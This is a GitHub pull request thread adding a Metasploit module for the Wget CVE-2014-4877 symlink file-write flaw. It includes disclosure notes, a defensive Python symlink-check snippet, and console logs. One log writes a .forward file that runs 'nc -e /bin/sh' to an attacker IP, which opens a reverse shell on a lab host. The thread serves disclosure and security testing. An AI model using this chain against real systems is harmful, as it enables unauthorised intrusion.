
Add module for CVE-2014-4877 (Wget) #4088

Merged: 1 commit, Oct 28, 2014

Conversation

@hdm (Contributor) commented Oct 28, 2014

This module exploits a vulnerability in Wget when used in recursive (-r) mode with an FTP server as a destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGET_DATA option.

Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.
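The bug class above is a recursive FTP client re-creating a server-supplied symlink locally and then writing the retrieved file through it. The following is an added illustration (not part of the PR or the Metasploit module) of the check a hardened mirroring client should make: parse each LIST entry, and refuse any symlink whose target resolves outside the mirror root instead of creating it. The listing lines, the root `/srv/mirror` and the directory names are constructed for the example.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import Optional

# Unix-style LIST line; the trailing " -> target" only appears for symlinks.
_LIST_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"\w{3}\s+\d{1,2}\s+[\d:]+\s+(?P<name>.+?)(?:\s+->\s+(?P<target>.+))?$"
)

@dataclass
class Entry:
    name: str
    is_symlink: bool
    target: Optional[str] = None

def parse_list_line(line: str) -> Entry:
    m = _LIST_RE.match(line.rstrip())
    if not m:
        raise ValueError(f"unrecognised LIST line: {line!r}")
    is_link = m.group("mode").startswith("l")
    return Entry(m.group("name"), is_link, m.group("target") if is_link else None)

def link_escapes_root(entry: Entry, link_dir: str, root: str) -> bool:
    """True if re-creating this symlink in link_dir would point outside root.
    Purely lexical (normpath); an absolute target such as /tmp/pwned or a
    ../ chain past the root both count as an escape. Retrieving the linked
    file as a plain file instead of creating a link (what wget 1.16 does by
    default) avoids the problem entirely."""
    if not entry.is_symlink or entry.target is None:
        return False
    root = posixpath.normpath(root)
    prefix = root if root.endswith("/") else root + "/"
    resolved = posixpath.normpath(posixpath.join(link_dir, entry.target))
    return resolved != root and not resolved.startswith(prefix)

def classify_listing(lines, link_dir: str, root: str) -> dict:
    """Map each entry name to 'ok' or 'symlink-refused'."""
    verdicts = {}
    for line in lines:
        e = parse_list_line(line)
        verdicts[e.name] = "symlink-refused" if link_escapes_root(e, link_dir, root) else "ok"
    return verdicts

# Constructed sample listing; the first symlink mirrors the "pwned -> /tmp/pwned"
# write shown in the PR's test log, the others are in-root and ../ cases.
SAMPLE_LISTING = [
    "-rw-r--r--   1 ftp      ftp            21 Oct 28  2014 README",
    "lrwxrwxrwx   1 ftp      ftp            10 Oct 28  2014 pwned -> /tmp/pwned",
    "lrwxrwxrwx   1 ftp      ftp             8 Oct 28  2014 notes -> ./README",
    "lrwxrwxrwx   1 ftp      ftp            16 Oct 28  2014 up -> ../../../outside",
]
```

Running `classify_listing(SAMPLE_LISTING, "/srv/mirror/ftp.example/dir", "/srv/mirror")` refuses `pwned` and `up` and accepts `README` and `notes`.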

@todb-r7 commented Oct 28, 2014

Already tested successfully:

msf auxiliary(wget_symlink_file_write) > exploit
[*] Auxiliary module execution completed
msf auxiliary(wget_symlink_file_write) > 
[+] Targets should run: $ wget -m ftp://173.255.206.36:2121/
[*] Server started.
[*] 1.2.3.4:43785 Logged in with user 'anonymous' and password 'anonymous'...
[*] 1.2.3.4:43785 -> LIST -a
[*] 1.2.3.4:43785 -> CWD /UccCkHMfFV43fxH
[*] 1.2.3.4:43785 -> LIST -a
[*] 1.2.3.4:43785 -> RETR pwned
[+] 1.2.3.4:43785 Hopefully wrote 21 bytes to /tmp/pwned
Interrupt: use the 'exit' command to quit
msf auxiliary(wget_symlink_file_write) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf auxiliary(wget_symlink_file_write) >

@todb-r7 commented Oct 28, 2014

Note, the rapid7 blog post will autopublish at 9am central time on Oct 28 (that's the disclosure date we provided to the maintainer and CERT/CC).

@todb-r7 commented Oct 28, 2014

I'll land this in the morning as well, which will close #4077.

wchen-r7 added the labels "module" and "hotness" (Something we're really excited about) on Oct 28, 2014

@wvu (Contributor) commented Oct 28, 2014

Updated the PR's description with the module's description. :)

@wvu (Contributor) commented Oct 28, 2014

Working nicely for me with .forward. :)

msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf exploit(handler) > set lhost 172.16.126.1
lhost => 172.16.126.1
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.126.1:4444
[*] Starting the payload handler...

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set target_file /home/msfadmin/.forward
target_file => /home/msfadmin/.forward
msf auxiliary(wget_symlink_file_write) > set target_data '\msfadmin, "| nc -e /bin/sh 172.16.126.1 4444 > /dev/null 2>&1 &"'
target_data => \msfadmin, "| nc -e /bin/sh 172.16.126.1 4444 > /dev/null 2>&1 &"
msf auxiliary(wget_symlink_file_write) > run
[*] Auxiliary module execution completed
msf auxiliary(wget_symlink_file_write) >
[+] Targets should run: $ wget -m ftp://10.6.0.198:2121/
[*] Server started.
[*] 172.16.126.129:45534 Logged in with user 'anonymous' and password 'anonymous'...
[*] 172.16.126.129:45534 -> LIST
[*] 172.16.126.129:45534 -> CWD /i8KLeF8P6O2P3xc
[*] 172.16.126.129:45534 -> LIST
[*] 172.16.126.129:45534 -> CWD /i8KLeF8P6O2P3xc
[*] 172.16.126.129:45534 -> RETR .forward
[+] 172.16.126.129:45534 Hopefully wrote 65 bytes to /home/msfadmin/.forward
[*] Command shell session 1 opened (172.16.126.1:4444 -> 172.16.126.129:33128) at 2014-10-28 06:43:23 -0500

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

@todb-r7 commented Oct 28, 2014

I'm curious if this affects a normal OSX build. I assume it ships with wget. @jvazquez-r7 can you do a quick wget --version? If the version is different from 1.14, then it'd be nice to update the module description.

I know that Ubuntu is vulnerable today and I don't see anything on the Ubuntu Security Notices page: http://www.ubuntu.com/usn/ . I'm opening a bug now, here: https://launchpad.net/ubuntu/+source/wget/+bugs

todb-r7 merged commit 64c206f into rapid7:master on Oct 28, 2014
todb-r7 pushed a commit that referenced this pull request Oct 28, 2014
Fixes #4077 as well.
@todb-r7 commented Oct 28, 2014

Bug against Ubuntu filed: https://bugs.launchpad.net/ubuntu/+source/wget/+bug/1386711

@todb-r7 commented Oct 28, 2014

Apparently, OSX doesn't usually ship with wget after all. Yay.

@wvu (Contributor) commented Oct 28, 2014

I checked an older version of OS X, so I'm probably wrong. Maybe OS X uses the GNU userland now. Who knows! Strange that there's no fetch, though.
